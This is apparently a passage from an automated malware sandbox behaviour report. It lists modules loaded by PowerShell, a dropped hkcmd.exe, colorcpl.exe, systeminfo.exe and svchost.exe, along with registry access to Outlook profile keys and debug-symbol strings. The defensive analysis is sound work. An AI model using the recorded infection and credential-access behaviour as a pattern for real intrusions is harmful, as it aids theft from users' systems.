                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: zipfldr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: url.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: archiveint.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ieproxy.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: mssip32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: smartscreenps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ??????????.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ???e???????????.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ???e???????????.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ??????????.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: tquery.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: spp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: endpointdlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: endpointdlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: endpointdlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: endpointdlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: advapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: advapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: advapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: advapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: advapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: advapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: advapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: sppwmi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: sppcext.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: winscard.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: sti.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: winsqlite3.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                    Source: Binary string: sysinfo.pdb source: colorcpl.exe, 0000000B.00000003.1170525304.0000000003446000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1170443738.0000000003434000.00000004.00000020.00020000.00000000.sdmp, jy7dhEfPtuBr.exe, 0000000D.00000003.1140275755.00000000009A5000.00000004.00000001.00020000.00000000.sdmp, jy7dhEfPtuBr.exe, 0000000D.00000003.1278259003.00000000009B7000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: sysinfo.pdbGCTL source: colorcpl.exe, 0000000B.00000003.1170525304.0000000003446000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1170443738.0000000003434000.00000004.00000020.00020000.00000000.sdmp, jy7dhEfPtuBr.exe, 0000000D.00000003.1140275755.00000000009A5000.00000004.00000001.00020000.00000000.sdmp, jy7dhEfPtuBr.exe, 0000000D.00000003.1278259003.00000000009B7000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: colorcpl.pdbGCTL source: jy7dhEfPtuBr.exe, 0000000D.00000002.2114696913.000000000392C000.00000004.80000000.00040000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2111977343.000000000545C000.00000004.10000000.00040000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2107718363.00000000030C9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.1490031766.000000002A9DC000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: colorcpl.pdb source: jy7dhEfPtuBr.exe, 0000000D.00000002.2114696913.000000000392C000.00000004.80000000.00040000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2111977343.000000000545C000.00000004.10000000.00040000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2107718363.00000000030C9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.1490031766.000000002A9DC000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: hkcmd.exe, 00000006.00000002.984937213.0000000002B10000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1039105080.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.968372647.000000007EB70000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: q;C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.pdb source: powershell.exe, 00000003.00000002.1021362956.00000000056E1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 0000000B.00000002.1223557227.000000002C63E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.1223557227.000000002C4A0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1114545597.00000000054BE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1112280718.0000000005307000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000003.1206156825.0000000004C80000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000003.1201739087.0000000004AD8000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2110869515.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2110869515.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 0000000B.00000002.1223557227.000000002C63E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.1223557227.000000002C4A0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1114545597.00000000054BE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1112280718.0000000005307000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 0000000E.00000003.1206156825.0000000004C80000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000003.1201739087.0000000004AD8000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2110869515.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2110869515.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdbGCTL source: hkcmd.exe, 00000006.00000002.984937213.0000000002B10000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1039105080.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.968808199.0000000000648000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.968808199.0000000000678000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.968372647.000000007EB70000.00000004.00001000.00020000.00000000.sdmp
